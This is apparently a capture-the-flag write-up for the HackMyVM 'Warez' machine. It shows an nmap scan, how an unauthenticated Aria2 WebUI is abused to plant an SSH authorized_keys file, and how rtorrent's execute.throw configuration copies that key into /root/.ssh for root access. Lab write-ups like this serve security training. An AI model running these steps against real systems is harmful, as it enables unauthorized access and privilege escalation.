NOTES ABOUT Warez
[ 2022-10-09 ] [ HackMyVM / Warez ]Status: Rooted
Skills: Port Scanning, openssl, aria2 WebUI
Tools: nmap, ssh, rtorrent, OpenSSL,
PORT SCANNING
$ nmap -T4 -sCSV -p- 10.0.2.23
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 3072 cc:00:63:dd:49:fb:1c:c7:ac:69:63:bc:05:1a:59:cd (RSA)
| 256 9b:19:49:25:eb:9c:60:c5:2b:ec:2a:d4:fd:d1:c2:f4 (ECDSA)
|_ 256 41:16:e6:d0:a0:da:22:4f:07:3f:c8:cf:60:2c:02:79 (ED25519)
80/tcp open http nginx 1.18.0
|_http-title: Aria2 WebUI
|_http-server-header: nginx/1.18.0
6800/tcp open http aria2 downloader JSON-RPC
|_http-title: Site doesn't have a title.
GETTING IN
$ cp ./id_rsa.pub authorized_keys
$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.0.2.23 - - [09/Oct/2022 22:16:09] "GET /authorized_keys HTTP/1.1" 200 -
^C
Keyboard interrupt received, exiting.
# DOWNLOAD authorized_keys VIA ARIA2 WEBUI TO /home/carolina/.ssh
$ ssh -i id_rsa carolina@10.0.2.23
carolina@warez:~$ cat user.txt
***********
ELEVATING PRIVILEGES
carolina@warez:~$ echo "execute.throw = mkdir, /root/.ssh" > .rtorrent.rc
carolina@warez:~$ rtorrent
carolina@warez:~$ echo "execute.throw = cp, /home/carolina/.ssh/authorized_keys, /root/.ssh/authorized_keys" > .rtorrent.rc
carolina@warez:~$ rtorrent
$ ssh -i ./id_rsa root@10.0.2.23
Linux warez 5.10.0-8-amd64 #1 SMP Debian 5.10.46-4 (2021-08-03) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Aug 31 02:34:57 2021
root@warez:~# cat root.txt
*************
root@warez:~# init 0